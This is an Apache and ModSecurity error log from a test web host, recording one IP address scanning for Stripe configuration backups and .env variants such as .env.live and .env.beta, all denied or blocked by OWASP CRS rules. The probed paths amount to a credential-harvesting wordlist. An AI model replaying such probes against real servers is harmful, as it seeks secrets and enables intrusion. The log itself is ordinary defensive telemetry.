[Fri Jan 16 03:21:30.629341 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:49850] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe_backup.php
[Fri Jan 16 03:21:30.756495 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:49864] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe_backup.php
[Fri Jan 16 03:21:30.912937 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:49878] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php~
[Fri Jan 16 03:21:31.094396 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:49880] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php~/
[Fri Jan 16 03:21:31.281637 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:49888] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.php~
[Fri Jan 16 03:21:31.455721 2026] [authz_core:error] [pid 1444226] [client 45.148.10.246:49896] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.php~
[Fri Jan 16 03:21:31.605509 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:49898] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.save
[Fri Jan 16 03:21:31.746588 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:49906] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/app/config/stripe.php.save/
[Fri Jan 16 03:21:31.921928 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:49914] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com//app/config/stripe.php.save
[Fri Jan 16 03:21:32.109712 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:49926] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config, referer: http://economiasolidale.test.indacotrentino.com/./app/config/stripe.php.save
[Fri Jan 16 03:21:32.291125 2026] [:error] [pid 1444034] [client 45.148.10.246:49934] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrORfEYyDES-ZFL4iwAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.live
[Fri Jan 16 03:21:32.291383 2026] [:error] [pid 1444034] [client 45.148.10.246:49934] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrORfEYyDES-ZFL4iwAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.live
[Fri Jan 16 03:21:32.291542 2026] [:error] [pid 1444034] [client 45.148.10.246:49934] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrORfEYyDES-ZFL4iwAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.live
[Fri Jan 16 03:21:32.463745 2026] [:error] [pid 1444226] [client 45.148.10.246:49936] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live/"] [unique_id "aWmgrGcpoCUgeFICb0bf-wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.live/
[Fri Jan 16 03:21:32.463981 2026] [:error] [pid 1444226] [client 45.148.10.246:49936] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live/"] [unique_id "aWmgrGcpoCUgeFICb0bf-wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.live/
[Fri Jan 16 03:21:32.464170 2026] [:error] [pid 1444226] [client 45.148.10.246:49936] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live/"] [unique_id "aWmgrGcpoCUgeFICb0bf-wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.live/
[Fri Jan 16 03:21:32.609366 2026] [:error] [pid 1444032] [client 45.148.10.246:49948] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrOkMvq8uPO2ZciWrVwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.live
[Fri Jan 16 03:21:32.609586 2026] [:error] [pid 1444032] [client 45.148.10.246:49948] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrOkMvq8uPO2ZciWrVwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.live
[Fri Jan 16 03:21:32.609772 2026] [:error] [pid 1444032] [client 45.148.10.246:49948] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrOkMvq8uPO2ZciWrVwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.live
[Fri Jan 16 03:21:32.768089 2026] [:error] [pid 1444040] [client 45.148.10.246:49960] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrPn_5sIyKhJ5GAza6QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.live
[Fri Jan 16 03:21:32.768330 2026] [:error] [pid 1444040] [client 45.148.10.246:49960] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrPn_5sIyKhJ5GAza6QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.live
[Fri Jan 16 03:21:32.768492 2026] [:error] [pid 1444040] [client 45.148.10.246:49960] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "aWmgrPn_5sIyKhJ5GAza6QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.live
[Fri Jan 16 03:21:32.945159 2026] [:error] [pid 1444031] [client 45.148.10.246:49962] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.demo"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.demo"] [unique_id "aWmgrH-9MmrgwjmYTAJT3AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.demo
[Fri Jan 16 03:21:32.945379 2026] [:error] [pid 1444031] [client 45.148.10.246:49962] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.demo"] [unique_id "aWmgrH-9MmrgwjmYTAJT3AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.demo
[Fri Jan 16 03:21:32.945538 2026] [:error] [pid 1444031] [client 45.148.10.246:49962] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.demo"] [unique_id "aWmgrH-9MmrgwjmYTAJT3AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.demo
[Fri Jan 16 03:21:33.579251 2026] [:error] [pid 1444035] [client 45.148.10.246:49966] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.demo"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.demo"] [unique_id "aWmgrbauW6yeGWXfDeFYgwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.demo
[Fri Jan 16 03:21:33.579489 2026] [:error] [pid 1444035] [client 45.148.10.246:49966] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.demo"] [unique_id "aWmgrbauW6yeGWXfDeFYgwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.demo
[Fri Jan 16 03:21:33.579649 2026] [:error] [pid 1444035] [client 45.148.10.246:49966] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.demo"] [unique_id "aWmgrbauW6yeGWXfDeFYgwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./.env.demo
[Fri Jan 16 03:21:33.679125 2026] [:error] [pid 1444034] [client 45.148.10.246:49978] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgreRfEYyDES-ZFL4iwQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.beta
[Fri Jan 16 03:21:33.679347 2026] [:error] [pid 1444034] [client 45.148.10.246:49978] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgreRfEYyDES-ZFL4iwQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.beta
[Fri Jan 16 03:21:33.679493 2026] [:error] [pid 1444034] [client 45.148.10.246:49978] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgreRfEYyDES-ZFL4iwQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.beta
[Fri Jan 16 03:21:33.838064 2026] [:error] [pid 1444226] [client 45.148.10.246:49980] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.beta/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta/"] [unique_id "aWmgrWcpoCUgeFICb0bf_AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.beta/
[Fri Jan 16 03:21:33.838286 2026] [:error] [pid 1444226] [client 45.148.10.246:49980] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta/"] [unique_id "aWmgrWcpoCUgeFICb0bf_AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.beta/
[Fri Jan 16 03:21:33.838462 2026] [:error] [pid 1444226] [client 45.148.10.246:49980] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta/"] [unique_id "aWmgrWcpoCUgeFICb0bf_AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.beta/
[Fri Jan 16 03:21:33.969168 2026] [:error] [pid 1444032] [client 45.148.10.246:49996] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgrekMvq8uPO2ZciWrWAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.beta
[Fri Jan 16 03:21:33.969407 2026] [:error] [pid 1444032] [client 45.148.10.246:49996] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgrekMvq8uPO2ZciWrWAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.beta
[Fri Jan 16 03:21:33.970080 2026] [:error] [pid 1444032] [client 45.148.10.246:49996] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgrekMvq8uPO2ZciWrWAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//.env.beta
[Fri Jan 16 03:21:34.131842 2026] [:error] [pid 1444040] [client 45.148.10.246:50004] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgrvn_5sIyKhJ5GAza6gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.beta
[Fri Jan 16 03:21:34.132074 2026] [:error] [pid 1444040] [client 45.148.10.246:50004] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgrvn_5sIyKhJ5GAza6gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.beta
[Fri Jan 16 03:21:34.132255 2026] [:error] [pid 1444040] [client 45.148.10.246:50004] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.beta"] [unique_id "aWmgrvn_5sIyKhJ5GAza6gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.beta
[Fri Jan 16 03:21:34.260256 2026] [:error] [pid 1444031] [client 45.148.10.246:50010] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgrn-9MmrgwjmYTAJT3QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.alpha
[Fri Jan 16 03:21:34.260476 2026] [:error] [pid 1444031] [client 45.148.10.246:50010] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgrn-9MmrgwjmYTAJT3QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.alpha
[Fri Jan 16 03:21:34.260629 2026] [:error] [pid 1444031] [client 45.148.10.246:50010] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha"] [unique_id "aWmgrn-9MmrgwjmYTAJT3QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.alpha
[Fri Jan 16 03:21:34.393793 2026] [:error] [pid 1444035] [client 45.148.10.246:50018] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.alpha/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.alpha/"] [unique_id "aWmgrrauW6yeGWXfDeFYhAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.alpha/
